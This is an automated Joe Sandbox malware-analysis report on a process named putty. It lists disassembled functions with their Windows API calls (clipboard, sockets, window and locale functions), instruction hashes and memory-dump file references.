Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Create$Event$CloseCriticalHandleInitializeSectionThread
String ID:
API String ID: 2660700835-0
Opcode ID: 5e69f48d9ae4b53cb993d0b7829aaac5c86295b063f7f43f162b6a613fb3ec7e
Instruction ID: cc0b5368d378f3d8074baf48d0a40d1d2b3a6f030afc2d605fcef07c8992bd9e
Opcode Fuzzy Hash: 5e69f48d9ae4b53cb993d0b7829aaac5c86295b063f7f43f162b6a613fb3ec7e
Instruction Fuzzy Hash: 99318032619A5186EB24CB29F85466E7394FB4D764F554239DF4D86BA0DF3CE045CB00

Function 00007FF6BB28B950 Relevance: 7.5, APIs: 5, Instructions: 27clipboardwindowCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00007FF6BB28B95A
GetClipboardData.USER32 ref: 00007FF6BB28B969
GetClipboardData.USER32 ref: 00007FF6BB28B981
SendMessageA.USER32 ref: 00007FF6BB28B99A
CloseClipboard.USER32 ref: 00007FF6BB28B9A0

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Clipboard$Data$CloseMessageOpenSend
String ID:
API String ID: 2111581930-0
Opcode ID: e93e0cf60494fe75f915791a3c77afe7e720d1734b7674f2dfd41008d92a8430
Instruction ID: 6176e573604b66892363111a903a8d28ebb0a3ec44664d1a19c9f06ab4cdddf7
Opcode Fuzzy Hash: e93e0cf60494fe75f915791a3c77afe7e720d1734b7674f2dfd41008d92a8430
Instruction Fuzzy Hash: 1BF01C11B1951283FF582BA9A90877D2191BF4CB50F95643CC70E866F0DD2EA8858F50

Function 00007FF6BB2C7AD0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF6BB2BDCDB), ref: 00007FF6BB2C7B7B
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF6BB2BDCDB), ref: 00007FF6BB2C7BA4

Strings

Error %d: %s, xrefs: 00007FF6BB2C7BC2
(unable to format: FormatMessage returned %u), xrefs: 00007FF6BB2C7BAA

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID: (unable to format: FormatMessage returned %u)$Error %d: %s
API String ID: 3479602957-1777221902
Opcode ID: 50b7d5e38316c6a05940f56ae2ca5412fa50f38d32d1291c4688ce92912f69f8
Instruction ID: 60880113d6ff71a5f30336a9d434821d176207fbd7c99cbd6d573fad962046af
Opcode Fuzzy Hash: 50b7d5e38316c6a05940f56ae2ca5412fa50f38d32d1291c4688ce92912f69f8
Instruction Fuzzy Hash: 34316021A0C64386EB609B1DE9513BA63A0FF8C744F144535EB9DC3BB9EE7DE5458B00

Function 00007FF6BB2E2190 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32 ref: 00007FF6BB30E2FC
FindClose.KERNEL32 ref: 00007FF6BB30E316
FindWindowA.USER32 ref: 00007FF6BB30E32A

Strings

Pageant, xrefs: 00007FF6BB30E320

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Find$CloseFileFirstWindow
String ID: Pageant
API String ID: 2475344593-3220706369
Opcode ID: 46b9dcd90dc30509f8ce6d4eeb7586a96e96ad226e4fda942849ad5c994bb184
Instruction ID: 3cfa330a8adba79fc3c10abcd2b86e4de075edb5ac30d269bc0f1052be3166b3
Opcode Fuzzy Hash: 46b9dcd90dc30509f8ce6d4eeb7586a96e96ad226e4fda942849ad5c994bb184
Instruction Fuzzy Hash: F8016121F1D64291FD20AB29A8553BE23517F5DBA0F944231DE1D867F1EE2CE48A8B00

Function 00007FF6BB28A01E Relevance: 6.2, APIs: 4, Instructions: 216COMMON

Download Yara Rule

APIs

SelectObject.GDI32 ref: 00007FF6BB28A462
SetTextColor.GDI32 ref: 00007FF6BB28A478
SetBkColor.GDI32 ref: 00007FF6BB28A487
SetBkMode.GDI32 ref: 00007FF6BB28A49D

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Color$ModeObjectSelectText
String ID:
API String ID: 3594386986-0
Opcode ID: 062e9b49704ff532ccb08a301ad4696c212a399bcaca2ce98464616b989bc9b3
Instruction ID: c5ae2a090017b0c7391e3ce9af882abb686ee6d9c145a83077af003ff61cabe5
Opcode Fuzzy Hash: 062e9b49704ff532ccb08a301ad4696c212a399bcaca2ce98464616b989bc9b3
Instruction Fuzzy Hash: C081E062E0CA2686FB248B1DAD803797691FB99780F154136DB4EC37B4DE7CE840DB40

Function 00007FF6BB28A03E Relevance: 6.2, APIs: 4, Instructions: 214COMMON

Download Yara Rule

APIs

SelectObject.GDI32 ref: 00007FF6BB28A462
SetTextColor.GDI32 ref: 00007FF6BB28A478
SetBkColor.GDI32 ref: 00007FF6BB28A487
SetBkMode.GDI32 ref: 00007FF6BB28A49D

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Color$ModeObjectSelectText
String ID:
API String ID: 3594386986-0
Opcode ID: 7965013e65fe39ea2ae5d9b7d588d824beffc7c579ab59e583ffeacae1a9d986
Instruction ID: bdc955c81d0be9150f376b7aec559db8d2d0013afbc4d296965e41974e09b6e0
Opcode Fuzzy Hash: 7965013e65fe39ea2ae5d9b7d588d824beffc7c579ab59e583ffeacae1a9d986
Instruction Fuzzy Hash: B281E062E0CA6686FB248B1DAD803797691FB99780F154136DB4EC37B4EE7CE840DB40

Function 00007FF6BB28A032 Relevance: 6.2, APIs: 4, Instructions: 214COMMON

Download Yara Rule

APIs

SelectObject.GDI32 ref: 00007FF6BB28A462
SetTextColor.GDI32 ref: 00007FF6BB28A478
SetBkColor.GDI32 ref: 00007FF6BB28A487
SetBkMode.GDI32 ref: 00007FF6BB28A49D

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Color$ModeObjectSelectText
String ID:
API String ID: 3594386986-0
Opcode ID: a8f5b5b0e585cb72b3f3f779b8361df6a7e167cc07a1f26b4896fd50d5f44db0
Instruction ID: 5d1325a1b81e707a4f9c9700a110191d455aea87d5463319f4b3a9faf82b436b
Opcode Fuzzy Hash: a8f5b5b0e585cb72b3f3f779b8361df6a7e167cc07a1f26b4896fd50d5f44db0
Instruction Fuzzy Hash: 8481DF62E0CA6686FB248B1DAD803797691FB99781F154136DB4EC37B4EE7CE840DB40

Function 00007FF6BB2BF550 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 00007FF6BB2BF56A
socket.WS2_32 ref: 00007FF6BB2BF5DC
SetHandleInformation.KERNEL32 ref: 00007FF6BB2BF5F0
WSAIoctl.WS2_32 ref: 00007FF6BB2BF63B

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: HandleInformationIoctlhtonlsocket
String ID:
API String ID: 8079943-0
Opcode ID: ae36db344186a0eb9e34698ac2dad325ae6413fbe426593a4c9a416f45cc5eb7
Instruction ID: c923504c21deb773f290cab0584bdb454426f5790f96e6746cbfc55a5cc21347
Opcode Fuzzy Hash: ae36db344186a0eb9e34698ac2dad325ae6413fbe426593a4c9a416f45cc5eb7
Instruction Fuzzy Hash: 1731F622B18A1242FB608B1CA991B7A7294BF8CB54F644235DF6D867B0DF7CE4418B00

Function 00007FF6BB2C79B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6BB2C7A12

Strings

GetVersionExA, xrefs: 00007FF6BB2C7A08
kernel32.dll, xrefs: 00007FF6BB2C79F0

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: AddressProc
String ID: GetVersionExA$kernel32.dll
API String ID: 190572456-3521452493
Opcode ID: 2157db9319e731e7e0727ab2f7b5dba32326632ca39b936267e30fe50393baf1
Instruction ID: 0f5d882d1e2b80859c2e859e15bc11246018e74f7824e9234b78f4b17376d788
Opcode Fuzzy Hash: 2157db9319e731e7e0727ab2f7b5dba32326632ca39b936267e30fe50393baf1
Instruction Fuzzy Hash: 70314262D1DB8285FB24CB1DE95077963A0BB9D354F20A235D69D826B5DF7CE1908F00

Function 00007FF6BB3523A8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,?,?,?,?,00007FF6BB348AD2), ref: 00007FF6BB35241C

Strings

GetLocaleInfoEx, xrefs: 00007FF6BB3523D5

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 877343d59bc69b94a8249b42954be88c557d486399bdd3dc21f370ad172789df
Instruction ID: 2ded8a672942eff1006581cfb2d0e8cddbf22cb7dd21019f1c1cfbdf8f0a52cd
Opcode Fuzzy Hash: 877343d59bc69b94a8249b42954be88c557d486399bdd3dc21f370ad172789df
Instruction Fuzzy Hash: 5A01A225B08B8186EB009B4AB8405AAB760BF8CBC0F584036DF0D87B79CE3CE5458744

Function 00007FF6BB2896E0 Relevance: 3.1, APIs: 2, Instructions: 55windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32 ref: 00007FF6BB289738
SetWindowTextA.USER32 ref: 00007FF6BB289792

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: IconicTextWindow
String ID:
API String ID: 3799979766-0
Opcode ID: 26ce7f5f71cf65a3c1f9fcbb369d726814f2bc5a90e97ade08b113dde8a27331
Instruction ID: 8d682c15352fd571c5616913e2ca5d4a3352dab7cab52cea75311f9f70c5ac31
Opcode Fuzzy Hash: 26ce7f5f71cf65a3c1f9fcbb369d726814f2bc5a90e97ade08b113dde8a27331
Instruction Fuzzy Hash: 0C113754E4865681FE049B2AAE411BD23A57F8CBD0F949031CF0EC77B2DE3CE4868B00

Function 00007FF6BB289610 Relevance: 3.1, APIs: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32 ref: 00007FF6BB289668
SetWindowTextA.USER32 ref: 00007FF6BB2896C1

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: IconicTextWindow
String ID:
API String ID: 3799979766-0
Opcode ID: 9d219cc0c16d3a47e0e70eb7a9a7b5746bdbf5c342f18f0b07b84ac588cb70fc
Instruction ID: 96d09e3620de69961762241692a20e4fbada041d78884d5873b8b342fe0d857c
Opcode Fuzzy Hash: 9d219cc0c16d3a47e0e70eb7a9a7b5746bdbf5c342f18f0b07b84ac588cb70fc
Instruction Fuzzy Hash: F2112314F0961681FA049B2AAE451BD13A17F8CBD0F949431CE0E87BB2DE7CE8868B00

Function 00007FF6BB35B7AC Relevance: 3.0, APIs: 2, Instructions: 49COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,00007FF6BB34BB20), ref: 00007FF6BB35B7C9
OutputDebugStringW.KERNEL32(?,?,?,00007FF6BB34BB20), ref: 00007FF6BB35B7E1

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: DebugDebuggerOutputPresentString
String ID:
API String ID: 4086329628-0
Opcode ID: 49a1c64a858603c720e45a5c08a4c2139bbd6e9b9c0423a1bee7ddfbcc3224c4
Instruction ID: 603057c2eb29d16edf33a86a300e40a52be251bbd7f44deabcb99b0409a2b570
Opcode Fuzzy Hash: 49a1c64a858603c720e45a5c08a4c2139bbd6e9b9c0423a1bee7ddfbcc3224c4
Instruction Fuzzy Hash: D2016121A0C69281FA606F1EA8411BD6294BF4CBC0F1C5035EB8DC77B6EF2CF4818718

Function 00007FF6BB2E3F40 Relevance: 3.0, APIs: 2, Instructions: 41fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32 ref: 00007FF6BB30E2FC
FindClose.KERNEL32 ref: 00007FF6BB30E316
FindWindowA.USER32 ref: 00007FF6BB30E32A

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Find$CloseFileFirstWindow
String ID:
API String ID: 2475344593-0
Opcode ID: f0e79997787017242be0678a1299ff4153720c64c21be0883609586eed0df27f
Instruction ID: 788943f301e536f202d2e49e338e90b2ba618ec28857f1bea491bef2f35a3692
Opcode Fuzzy Hash: f0e79997787017242be0678a1299ff4153720c64c21be0883609586eed0df27f
Instruction Fuzzy Hash: F8017C21F0D64281F920A72DA9463BE13506F8D7B0F940231DE2D877E1ED2CE48A8B00

Function 00007FF6BB281B9F Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 00007FF6BB281BB9

Part of subcall function 00007FF6BB28B6C0: SetCaretPos.USER32 ref: 00007FF6BB28B6F8

DefWindowProcW.USER32 ref: 00007FF6BB283732

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CaretInfoLocaleProcWindow
String ID:
API String ID: 3511955094-0
Opcode ID: 0d6e8085940ef99706bb6f3e1a4ef4ac9e24338f3159f2bfa11a7cc6f6f21ebf
Instruction ID: f403dbb5d2427e394199486ec7747e9379dedb55a658714099d87ff565094ed5
Opcode Fuzzy Hash: 0d6e8085940ef99706bb6f3e1a4ef4ac9e24338f3159f2bfa11a7cc6f6f21ebf
Instruction Fuzzy Hash: 2AF0A726B4918645FA12AB1ABC113FA21407F8DBE5F840036DF0E877B2CD7CD2C69B00

Function 00007FF6BB359A14 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB353098: GetLastError.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB3530A7
Part of subcall function 00007FF6BB353098: FlsGetValue.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB3530BC
Part of subcall function 00007FF6BB353098: SetLastError.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB353147

EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6BB359817,00000000,00000092,?,?,00000000,?,?,00007FF6BB3488F9), ref: 00007FF6BB359AB2

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystemValue
String ID:
API String ID: 3029459697-0
Opcode ID: 88e0867d24c3eab24e0c880a4b38ef51eafc333871d5a020cd09adc8302cdfcc
Instruction ID: 4c153388126eea461cc95ea15e2b4152ef727aad8ae97c6bd0dccef5994eab6a
Opcode Fuzzy Hash: 88e0867d24c3eab24e0c880a4b38ef51eafc333871d5a020cd09adc8302cdfcc
Instruction Fuzzy Hash: 3F11E763E086458AEB148F2AD0502A877A0FB94BA0F544236C719833E0DE38D5D1C750

Function 00007FF6BB359D30 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB353098: GetLastError.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB3530A7
